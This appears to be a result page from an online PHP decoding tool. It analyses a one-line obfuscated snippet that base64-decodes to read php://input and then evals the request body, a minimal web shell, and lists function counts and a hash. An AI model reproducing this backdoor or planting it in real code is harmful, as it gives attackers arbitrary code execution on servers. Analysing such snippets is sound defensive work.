Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php echo eval(base64_decode(urldecode(file_get_contents(base64_decode("cGhwOi8vaW5wdXQ="..

Decoded Output download

None

Did this file decode correctly?

Original Code

<?php echo eval(base64_decode(urldecode(file_get_contents(base64_decode("cGhwOi8vaW5wdXQ=")))));

Function Calls

urldecode 1
base64_decode 2
file_get_contents 1

Variables

None

Stats

MD5 b53995b6282caa401ab62a4916221598
Eval Count 1
Decode Time 61 ms